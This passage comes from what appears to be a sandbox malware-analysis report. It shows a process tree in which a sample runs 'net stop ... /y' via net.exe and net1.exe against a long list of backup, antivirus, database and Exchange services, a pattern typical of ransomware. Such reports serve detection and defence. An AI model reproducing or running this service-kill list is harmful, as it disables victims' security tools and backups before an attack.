  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:2268
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:1976
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService /y
      4⤵
      PID:2472
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:2204
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
      4⤵
      PID:2612
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:272
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
      4⤵
      PID:2400
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop klnagent /y
    3⤵
    PID:1580
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop klnagent /y
      4⤵
      PID:2572
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:2588
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:2960
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop kavfsslp /y
    3⤵
    PID:1320
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop kavfsslp /y
      4⤵
      PID:2976
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:2564
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:2924
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamCatalogSvc /y
    3⤵
    PID:2892
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamCatalogSvc /y
      4⤵
      PID:2780
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:2952
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:1508
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLSERVER /y
    3⤵
    PID:2860
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER /y
      4⤵
      PID:1948
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamDeploySvc /y
    3⤵
    PID:2820
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploySvc /y
      4⤵
      PID:2904
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MBAMService /y
    3⤵
    PID:2604
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MBAMService /y
      4⤵
      PID:3040
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MBEndpointAgent /y
    3⤵
    PID:2652
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MBEndpointAgent /y
      4⤵
      PID:2156
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:820
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:3016
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McAfeeEngineService /y
    3⤵
    PID:2676
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McAfeeEngineService /y
      4⤵
      PID:2740
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLServerADHelper /y
    3⤵
    PID:1524
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper /y
      4⤵
      PID:776
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamHvIntegrationSvc /y
    3⤵
    PID:2088
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
      4⤵
      PID:2052
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:3020
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
      4⤵
      PID:1516
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop masvc /y
    3⤵
    PID:2496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop masvc /y
      4⤵
      PID:3068
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:2696
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:2948
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamBrokerSvc /y
    3⤵
    PID:2608
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamBrokerSvc /y
      4⤵
      PID:2828
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:2888
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:2080
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLServerADHelper100 /y
    3⤵
    PID:2940
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
      4⤵
      PID:2076
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:1548
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:2620
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:2664
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:3060
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:2688
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:2752
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McAfeeFramework /y
    3⤵
    PID:576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McAfeeFramework /y
      4⤵
      PID:2360
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:2864
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:2336
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:2500
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop veeam /y
      4⤵
      PID:2240
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:2544
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:2812
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop macmnsvc /y
    3⤵
    PID:2736
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop macmnsvc /y
      4⤵
      PID:2412
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:2340
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:2332
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamCloudSvc /y
    3⤵
    PID:2184
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamCloudSvc /y
      4⤵
      PID:2508
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamMountSvc /y
    3⤵
    PID:2208
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamMountSvc /y
      4⤵
      PID:624
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLServerOLAPService /y
    3⤵
    PID:2168
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
      4⤵
      PID:2272
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:1604
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:2444
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:2252
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:2392
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:2236
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:2912
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:2396
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
      4⤵
      PID:3036
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Acronis VSS Provider” /y
    3⤵
    PID:2200
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
      4⤵
      PID:2852
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MsDtsServer /y
    3⤵
    PID:2320
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer /y
      4⤵
      PID:2640
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:2316
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop sophos /y
      4⤵
      PID:2976
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:2460
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop CAARCUpdateSvc /y
      4⤵
      PID:2908
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:2488
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop CASAD2DWebSvc /y
      4⤵
      PID:2568
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:2248
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:2356
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:2216
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:3008
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop IISAdmin /y
    3⤵
    PID:2284
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:1160
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Enterprise Client Service” /y
    3⤵
    PID:2984
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Enterprise Client Service” /y
      4⤵
      PID:1508
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:1220
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
      4⤵
      PID:3052
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MySQL57 /y
    3⤵
    PID:2456
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MySQL57 /y
      4⤵
      PID:1064
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSExchangeES /y
    3⤵
    PID:2148
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeES /y
      4⤵
      PID:2896
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “SQL Backups /y
    3⤵
    PID:2420
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “SQL Backups /y
      4⤵
      PID:2980
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SOPHOS /y
    3⤵
    PID:2740
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
      4⤵
      PID:2580
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McShield /y
    3⤵
    PID:2904
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McShield /y
      4⤵
      PID:2028
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Agent” /y
    3⤵
    PID:2080
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Agent” /y
      4⤵
      PID:2800
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:436
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:2972
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamRESTSvc /y
    3⤵
    PID:2092
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:2592
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MySQL80 /y
    3⤵
    PID:2076
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MySQL80 /y
      4⤵
      PID:1108
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:3032
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:2840
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mfefire /y
    3⤵
    PID:2484
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfefire /y
      4⤵
      PID:1064
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop OracleClientCache80 /y
    3⤵
    PID:2680
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop OracleClientCache80 /y
      4⤵
      PID:1700
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McTaskManager /y
    3⤵
    PID:2956
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McTaskManager /y
      4⤵
      PID:2928
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MsDtsServer100 /y
    3⤵
    PID:3040
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:1500
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop sacsvr /y
    3⤵
    PID:3060
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop sacsvr /y
      4⤵
      PID:2400
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop EraserSvc11710 /y
    3⤵
    PID:2448
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EraserSvc11710 /y
      4⤵
      PID:2152
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop msftesql$PROD /y
    3⤵
    PID:564
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:2428
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop NetMsmqActivator /y
    3⤵
    PID:2760
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop NetMsmqActivator /y
      4⤵
      PID:2944
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$CXDB /y
    3⤵
    PID:2784
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CXDB /y
      4⤵
      PID:872
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:2172
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:1600
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SstpSvc /y
    3⤵
    PID:2228
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SstpSvc /y
      4⤵
      PID:2432
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSExchangeMTA /y
    3⤵
    PID:2540
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMTA /y
      4⤵
      PID:2988
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Device Control Service” /y
    3⤵
    PID:2360
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
      4⤵
      PID:2700
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:2708
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:2260
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Symantec System Recovery” /y
    3⤵
    PID:2232
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Symantec System Recovery” /y
      4⤵
      PID:1312
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSOLAP$SQL_2008 /y
    3⤵
    PID:2724
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
      4⤵
      PID:2488
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop UI0Detect /y
    3⤵
    PID:332
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop UI0Detect /y
      4⤵
      PID:1348
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSExchangeSA /y
    3⤵
    PID:2576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:2072
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos File Scanner Service” /y
    3⤵
    PID:2616
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
      4⤵
      PID:2668
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ReportServer$TPS /y
    3⤵
    PID:3056
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPS /y
      4⤵
      PID:2920
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:1036
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
      4⤵
      PID:2628
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:2520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:2156
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop W3Svc /y
    3⤵
    PID:2276
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:2640
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSExchangeSRS /y
    3⤵
    PID:2272
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:2528
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Health Service” /y
    3⤵
    PID:1480
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Health Service” /y
      4⤵
      PID:2304
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ReportServer$TPSAMA /y
    3⤵
    PID:2572
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
      4⤵
      PID:2604
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Zoolz 2 Service” /y
    3⤵
    PID:2188
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
      4⤵
      PID:2284
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSExchangeIS /y
    3⤵
    PID:2184
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS /y
      4⤵
      PID:1976
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:1524
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:2892
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SAVAdminService /y
    3⤵
    PID:2236
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SAVAdminService /y
      4⤵
      PID:1580
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSOLAP$TPS /y
    3⤵
    PID:2496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPS /y
      4⤵
      PID:2396
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos AutoUpdate Service” /y
    3⤵
    PID:2208
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
      4⤵
      PID:1572
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mfemms /y
    3⤵
    PID:2168
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfemms /y
      4⤵
      PID:2740
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$ECWDB2 /y
    3⤵
    PID:2860
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
      4⤵
      PID:2264
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SamSs /y
    3⤵
    PID:2200
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SamSs /y
      4⤵
      PID:2244
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SAVService /y
    3⤵
    PID:2216
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SAVService /y
      4⤵
      PID:2356
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ReportServer /y
    3⤵
    PID:988
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:2480
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “aphidmonitorservice” /y
    3⤵
    PID:2880
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “aphidmonitorservice” /y
      4⤵
      PID:2552
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:2204
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:3004
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:2468
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “SQLsafe Backup Service” /y
    3⤵
    PID:888
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
      4⤵
      PID:3048
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop msexchangeadtopology /y
    3⤵
    PID:1912
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop msexchangeadtopology /y
      4⤵
      PID:2596
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos MCS Agent” /y
    3⤵
    PID:2104
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
      4⤵
      PID:2616
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:2532
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:2724
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MsDtsServer110 /y
    3⤵
    PID:1468
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer110 /y
      4⤵
      PID:2460
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop POP3Svc /y
    3⤵
    PID:2884
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop POP3Svc /y
      4⤵
      PID:1604
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSExchangeMGMT /y
    3⤵
    PID:1340
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:2892
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Clean Service” /y
    3⤵
    PID:2828
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Clean Service” /y
      4⤵
      PID:2608
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSOLAP$TPSAMA /y
    3⤵
    PID:2928
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:1508
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop RESvc /y
    3⤵
    PID:2712
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop RESvc /y
      4⤵
      PID:564
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SepMasterService /y
    3⤵
    PID:1516
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SepMasterService /y
      4⤵
      PID:324
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:2808
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
      4⤵
      PID:2784
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ShMonitor /y
    3⤵
    PID:3068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ShMonitor /y
      4⤵
      PID:2584
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$PROD /y
    3⤵
    PID:924
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROD /y
      4⤵
      PID:3056
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SMTPSvc /y
    3⤵
    PID:2424
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:2988
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:2732
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:2940
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “SQLsafe Filter Service” /y
    3⤵
    PID:3040
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
      4⤵
      PID:820
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “intel(r) proset monitoring service” /y
    3⤵
    PID:1100
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
      4⤵
      PID:2316
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mfevtp /y
    3⤵
    PID:2412
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfevtp /y
      4⤵
      PID:2080
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop Smcinst /y
    3⤵
    PID:2992
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Smcinst /y
      4⤵
      PID:332
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:2904
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
      4⤵
      PID:3184
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SmcService /y
    3⤵
    PID:2748
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SmcService /y
      4⤵
      PID:1968
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:2372
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:3088
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SntpService /y
    3⤵
    PID:2140
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SntpService /y
      4⤵
      PID:2980
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:2644
  - - C:\Windows\SysWOW64\net1.exe
